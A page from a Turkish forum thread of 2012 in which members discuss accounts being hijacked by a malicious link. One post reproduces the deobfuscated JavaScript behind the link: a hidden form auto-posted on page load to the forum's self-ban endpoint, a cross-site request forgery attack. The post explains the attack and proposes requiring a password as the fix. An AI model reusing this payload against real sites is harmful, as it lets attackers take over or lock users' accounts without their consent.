Şimdi Ara

Hesap Çalınmaları Hk. (7. sayfa)

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
479
Cevap
3
Favori
13.561
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: önceki 56789
Sayfaya Git
Git
sonraki
Giriş
  • geçici olarak **** engeleblir yada o çocuğun verdiği direk link **** yapılırsa geçici çözüm olabilir . şu an konularda hala aynı imzada kişiler var . her dakika başka biri tıklıyor.
  • quote:

Orijinalden alıntı: hckr

Sorunun ne olduğunu tam anlamıyla çözdüm yöneticiler eğer bilgiye ihtiyaç duyuyorlarsa PM atsınlar.

Sherlcok Holmes Mod: On

Hacker bu beyler.

Aklı sıra kahramanlık yapıp yönetici olmak için göze girecek. Kendi yaptığı saldırıyı deşifre ediyor.

Sherlock Holmes Mod: Off
  • Olayların sorumlusunu ifşa etsem mi acaba?

< Bu ileti mobil sürüm kullanılarak atıldı >
  • Eski bilgileri geri yükleme gibi bir şansımız yok mu? İmzayı bulurum da 2. el imza 2. el açısından önemliydi benim için.
  • geçmiş olsun arkadaşlar,düzeltmek için uğraşan herkesin eline sağlık
  • quote:

Orijinalden alıntı: Barış.

quote:

Orijinalden alıntı: MechE-15

Etrafta hacklenmis hesaplar cirit atıyor bence yönetim bilgilendirme amaçlı toplu pm atmalı.

Katılıyorum.

@hckr hocam sen de çözdüysen ne yapıp ne yapmamamız gerektiğini burdan yazarsan ona göre önlemimizi alırız

Kesinlikle o kişiler sizin şifrelerinizi ele geçirmiş değiller.Eğer linke tıkladıysanız biraz bekleyin.Ben çözdüm derken adamların bunu tam olarak nasıl yaptıklarını çözdüm demek istedim.Sanırım yöneticiler de çözmüş tam anlamıyla meseleyi şu an için PM göndermediler bana.

• quote:

Orijinalden alıntı: South Korea

http://forum.donanimhaber.com/uzaklas_vazgec.asp

çalışmıyormuş-muş
  • quote:

Orijinalden alıntı: Kril

Olayların sorumlusunu ifşa etsem mi acaba?

beyler adamın imzasına bakın php kodları var
    peki bizim yedigimiz sayfa neydi cek.php

bu adam her konuya aynı seyı yazıyor bu yaptı banlayın bunu

< Bu mesaj bu kişi tarafından değiştirildi Soran Adam -- 18 Ağustos 2012; 16:52:43 >
  • quote:

Orijinalden alıntı: furkan19o7

quote:

beyler imzaya bakın php kodları

bu adam her konuya aynı seyı yazıyor banlayın bunu

C+ değil mi la o?
  • Şifre de değişmiş. Sıfırlamak için mail adresini girsem mi?
  • çok feci halde cek.php ye giresim varrrrr engel olamıyorum kendime

sıyırdım heralde girmek istiyorum o sayfaya da gider üyelik
  • Siz o linke tıkladığınızda uzaklas.asp'deki gun isimle select alanına rastgele belirledikleri bir sayıyı javascript post metoduyla yolluyorlar.
    quote:

//eval _3162=_7911 //eval _9818=_3162 //eval _3611=_6344 //eval function post_to_url(path, params, method) {method = method || "post";var form = document.createElement("form");//Move the submit function to another variable//so that it doesn't get overwritten.form._submit_function_ = form.submit;form.setAttribute("method", method);form.setAttribute("action", path);for(var key in params) {var hiddenField = document.createElement("input");hiddenField.setAttribute("type", "hidden");hiddenField.setAttribute("name", key);hiddenField.setAttribute("value", params[key]);form.appendChild(hiddenField);}document.body.appendChild(form);form._submit_function_();} $(document).ready(function() { post_to_url("http://resim.donanimhaber.com/uzaklas.asp", { gun: "3" }); }); //jsunpack.url var _6344 = function post_to_url(path, params, method) {method = method || "post";var form = document.createElement("form");//Move the submit function to another variable//so that it doesn't get overwritten.form._submit //jsunpack.url var _3611 = function post_to_url(path, params, method) {method = method || "post";var form = document.createElement("form");//Move the submit function to another variable//so that it doesn't get overwritten.form._submit

Profildeki değişiklikler de aynı mantıkla yapılıyor.
    Sorunun çözümü basit:Bu tür değişikliklerin yapıldığı sayfalarda şifre alanı olacak.

< Bu mesaj bu kişi tarafından değiştirildi hckr -- 18 Ağustos 2012; 16:53:20 >

• quote:

Orijinalden alıntı: Emmesen

çok feci halde cek.php ye giresim varrrrr engel olamıyorum kendime

sıyırdım heralde girmek istiyorum o sayfaya da gider üyelik

harbiden ya. ben de çok merak ettim. hazır virüsü yiyen birisi sitenin ss'inin alabilirse çok seviniriz
  • quote:

Orijinalden alıntı: furkan19o7

quote:

beyler adamın imzasına bakın php kodları var

bu adam her konuya aynı seyı yazıyor bu yaptı banlayın bunu

Lol nasıl da heyecan yapmış =D Bi' kere o kod ansi C/C kodu. Bense sadece dikkat çekmeye çalışan herhangi bir ergen olabilirim.

< Bu ileti mobil sürüm kullanılarak atıldı >
  • Sorunun sebebi ve çözümü bir üstteki mesajımda yazıyor yöneticiler.
  • her şeyi gün reis mi yapmış yani ayıp
  • Oha az önce yanlışlıkla mouse'a tıkladım.Ekrandada hacklenmiş hesaplardan biri vardı.2-3 inçle kurtardım hesabı valla
  • benim de hesabım biraz önce kurban gitti şuan arkadaşımın hesabından yazıyorum

KULLANICI ADIM : YSOFT

**** olay bu siteden kaynaklanıyor arkadaşlar.

****]]] cek.php
    ****]]] profil.php
    ****]]]] uzaklas.php
    ve kaç hesabın bu işe kurban gittiğini gösteren ****]]] data.txt
    sakın bu linklere tıklamayın.

zeki arkadaşımız hesaplarımızı 30 gün kendi isteğimiz ile banlatıp imzamızı ve kullanıcı bilgilerimizi değiştiriyor.
    kullanıcı bilgilerimizin değiştiğini şu ekran görüntüleri ile görebiliriz.

sitenin barındığı net-sis firmasına gerekli bilgiler e-mail olarak attım. rdsnin verdiği mail adresine de mail attım.

kusura bakmayın ama bu gavat arkadaşımız maillerimizi de mailinator gibi bir siteden otomatik üye aldırıp onlara geçiriyor.

üyeliğimin banının açılmasını talep ediyorum YSOFT

• 
Sayfa: önceki 56789
Sayfaya Git
Git
sonraki
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.